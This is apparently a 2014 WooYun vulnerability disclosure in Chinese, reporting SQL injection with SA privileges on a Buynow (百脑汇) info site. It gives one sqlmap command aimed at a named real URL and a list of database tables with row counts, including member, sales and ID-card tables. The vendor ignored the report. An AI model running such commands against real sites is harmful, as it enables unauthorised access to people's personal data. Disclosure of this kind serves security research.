漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-079414
漏洞标题:百脑汇某漏洞致百万会员信息泄露(SA权限)
相关厂商:百脑汇
漏洞作者: 路人甲
提交时间:2014-10-14 22:44
修复时间:2014-11-28 22:46
公开时间:2014-11-28 22:46
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-10-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-28: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
0.0
详细说明:
百脑汇
SqlMap.exe -u "http://info.buynow.com.cn/Food/ShowDetail.aspx?id=67999&shopID=1071" -v 3
SA权限
数据:
Database: cssite
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| dbo.No5_SiteVisits_Day_PagePath_WO | 52354664
| dbo.No5_SiteVisits_Day_PagePath_WO | 52354664
| dbo.No5_SiteVisits20130328 | 14972144
| dbo.No5_SiteVisits_20121205 | 11679459
| dbo.No5_SiteVisits_20121205 | 11679459
| dbo.Ems_ActivityGuide_RopeMember | 11297697
| dbo.Ems_ActivityGuide_RopeMember | 11297697
| dbo.No5_SiteVisits_20140609 | 6301842 |
| dbo.No5_Member_20120917 | 2215226 |
| dbo.No5_Member_20120917 | 2215226 |
| dbo.No5_Member20120712 | 2024513 |
| dbo.No5_Member20120703 | 2013980 |
| dbo.EMS_Account | 1825548 |
| dbo.pre_buynow_users_log | 1754839 |
| dbo.No5_SaleDetail_20120917 | 1569463 |
| dbo.No5_SaleDetail_20120917 | 1569463 |
| dbo.No5_Salemaster_20120917 | 1562461 |
| dbo.No5_Salemaster_20120917 | 1562461 |
| dbo.No5_SaleDetail20120703 | 1509262 |
| dbo.No5_SaleMaster20120703 | 1502260 |
| dbo.No5_SiteVisits_Day_Keyword_WO | 1044180 |
| dbo.No5_SiteVisits_Day_Keyword_WO | 1044180 |
| dbo.EDM_TJ_Mail2 | 1033595 |
| dbo.EDM_TJ_Mail2 | 1033595 |
| dbo.No5_SiteLog | 924004 |
| dbo.x2_n_goods_user | 779314 |
| dbo.no5_MemberCount | 546966 |
| dbo.No5_tblintegrallog | 546128 |
| dbo.SMS_list | 527033 |
| dbo.view_ProductALL | 511264 |
| dbo.view_ProductALL | 511264 |
| dbo.view_ProductCenter | 511264 |
| dbo.No5_MailLog | 483810 |
| dbo.mallbuilder_turntable_user | 363562 |
| dbo.No5_Ecs_Users | 357708 |
| dbo.EDM_Error | 357141 |
| dbo.mallbuilder_msg_ref | 352165 |
| dbo.mallbuilder_msg_ref | 352165 |
| dbo.no5_tj | 310042 |
| dbo.CS_User | 217216 |
| dbo.mallbuilder_player_vote_detail | 169451 |
| dbo.mallbuilder_player_vote_detail | 169451 |
| dbo.EDM_TJ_Page | 164521 |
| dbo.x2_n_event_log | 157554 |
| dbo.x2_supplier_id | 139957 |
| dbo.No5_SiteVisits_Hour | 96692 |
| dbo.mallbuilder_turntable_logs | 87543 |
| dbo.mallbuilder_turntable_logs | 87543 |
| dbo.mallbuilder_member | 72713 |
| dbo.No5_Site_BlogVisits | 72626 |
| dbo.mallbuilder_checkin_logs | 51711 |
| dbo.View_ShopDayPeopleFlux | 49561 |
| dbo.View_ShopDayPeopleFlux | 49561 |
| dbo.view_Plan | 41260 |
| dbo.View_Business | 36300 |
| dbo.SMS_temp | 34792 |
| dbo.codetable | 22689 |
| dbo.mallbuilder_shake_logs | 18362 |
| dbo.x2_n_advcount | 17721 |
| dbo.x2_n_advcount | 17721 |
| dbo.EDM_temp1to1 | 16922 |
| dbo.EDM_TEMP0301 | 16187 |
| dbo.EDM_TEMP0301 | 16187 |
| dbo.x2_n_report_day | 13091 |
| dbo.mallbuilder_shop | 11570 |
| dbo.x2_n_goods_quotation | 11550 |
| dbo.x2_n_goods_quotation | 11550 |
| dbo.x2_n_supplier_info | 11343 |
| dbo.x2_n_Price_RealTime | 10842 |
| dbo.View_Operator | 10152 |
| dbo.view_Contract2 | 7761 |
| dbo.view_Contract1 | 7579 |
| dbo.view_Contract1 | 7579 |
| dbo.No5_Site_FindBao | 7241 |
| dbo.x2_n_goods_sku | 7201 |
| dbo.x2_n_report_detail | 6928 |
| dbo.No5_SiteVisits_Day_Device_WO | 6862 |
| dbo.No5_SiteVisits_Day_Device_WO | 6862 |
| dbo.mallbuilder_goods | 5987 |
| dbo.x2_supplier_count | 5152 |
| dbo.x2_n_weekearn | 5054 |
| dbo.No5_SiteKpi20140702 | 3228 |
| dbo.view_employee_CS | 3128 |
| dbo.view_employee_CS | 3128 |
| dbo.No5_SiteVisits_Week | 2958 |
| dbo.View_No5_SiteVisits_Week | 2958 |
| dbo.CS_ArticleCategory | 2090 |
| dbo.CS_ArticleCategory | 2090 |
| dbo.M_upload_log | 2048 |
| dbo.No5_Shop_WebUU_Day | 1917 |
| dbo.mallbuilder_tg | 1834 |
| dbo.View_Department | 1808 |
| dbo.mallbuilder_advs_con | 1660 |
| dbo.mallbuilder_advs_con | 1660 |
| dbo.No5_Site_Employee | 1655 |
| dbo.mallbuilder_activity_relation | 1440 |
| dbo.CS_IdentifyCard | 1300 |
| dbo.CS_ServiceBill | 1300 |
| dbo.No5_SynTempProduct | 1254 |
| dbo.CS_ProductImport | 1140 |
| dbo.CS_ProductImport | 1140 |
| dbo.mallbuilder_checkin_exchange_logs | 1009 |
| dbo.mallbuilder_checkin_exchange_logs | 1009 |
| dbo.Edm_Log_Summary | 999 |
| dbo.Edm_Log_Summary | 999 |
| dbo.No5_SiteKpi20130606 | 960 |
| dbo.No5_SiteKpi20130606 | 960 |
| dbo.No5_SiteKpi20130702 | 960 |
| dbo.x2_n_supplier_replenish | 832 |
| dbo.No5_SiteVisits_Month | 699 |
| dbo.View_No5_SiteVisits_Month | 699 |
| dbo.No5_Shop_Weibo_Day | 636 |
| dbo.No5_Brand_Category | 347 |
| dbo.No5_Brand_Category | 347 |
| dbo.CS_ProductPrice | 287 |
| dbo.mallbuilder_sms_goods | 279 |
| dbo.mallbuilder_sms_goods | 279 |
| dbo.View_Honour | 242 |
| dbo.No5_Shop_Weibo_Import_Day | 230 |
| dbo.view_Sns_day | 230 |
| dbo.No5_PosConfig | 211 |
| dbo.x2_n_report_speed_detail | 203 |
| dbo.view_Clippings | 164 |
| dbo.CS_Communicator | 159 |
| dbo.View_Duty | 142 |
| dbo.No5_RecentUsed | 136 |
| dbo.CS_KPI_DAY | 132 |
| dbo.CS_KPI_DAY | 132 |
| dbo.CS_Enum | 107 |
| dbo.Import_Temp | 103 |
| dbo.View_Visit | 103 |
| dbo.View_ExpenseItem | 96 |
| dbo.mallbuilder_shake_price | 84 |
| dbo.tablespaceinfo | 76 |
| dbo.mallbuilder_voting | 75 |
| dbo.View_RecentUsed | 66 |
| dbo.CS_Recipients | 57 |
| dbo.view_SaleArea | 51 |
| dbo.view_SaleArea | 51 |
| dbo.Ems_ActivityTemplateDetail | 50 |
| dbo.Ems_ActivityTemplateDetail | 50 |
| dbo.No5_ManageKPI | 50 |
| dbo.No5_SiteVisits_Channels_Keyword | 48 |
| dbo.No5_SiteVisits_Channels_Keyword | 48 |
| dbo.No5_ProductCategory | 46 |
| dbo.No5_ProductCategory | 46 |
| dbo.sns_target_detail | 46 |
| dbo.sns_target_detail | 46 |
| dbo.No5_ShopConfig | 39 |
| dbo.Import_NewBrandID_Temp | 36 |
| dbo.mallbuilder_apply | 34 |
| dbo.No5_Shop20131014 | 32 |
| dbo.mallbuilder_msg_templates | 31 |
| dbo.mallbuilder_branch | 28 |
| dbo.BNGrid_DataList | 27 |
| dbo.No5_Shop_SnsConfig | 23 |
| dbo.No5_Shop_SnsConfig | 23 |
| dbo.shop | 23 |
| dbo.View_Story | 23 |
| dbo.view_EC_Kind | 21 |
| dbo.No5_CategoryMatch | 20 |
| dbo.mallbuilder_activity_module | 18 |
| dbo.mallbuilder_activity_module | 18 |
| dbo.x2_n_report_mod | 18 |
| dbo.x2_n_report_speed_main | 16 |
| dbo.View_Holiday | 14 |
| dbo.CS_Category | 13 |
| dbo.View_Video | 13 |
| dbo.CS_WebPart | 12 |
| dbo.No5_SiteVisits_Segment | 12 |
| dbo.mallbuilder_guess_logs | 11 |
| dbo.mallbuilder_guess_logs | 11 |
| dbo.CS_Attachment | 9 |
| dbo.View_Leaders4 | 7 |
| dbo.No5_Site_BlogCategory | 6 |
| dbo.mallbuilder_red_envelope_logs | 4 |
| dbo.mallbuilder_red_envelope_logs | 4 |
| dbo.BNGrid_QuerySolutionDetail | 3 |
| dbo.BNGrid_QuerySolutionDetail | 3 |
| dbo.Ros_RosConfig | 2 |
| dbo.CS_ServiceUser | 1 |
+---------------------------------------+---------+
ok 不深入
漏洞证明:
如上~
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝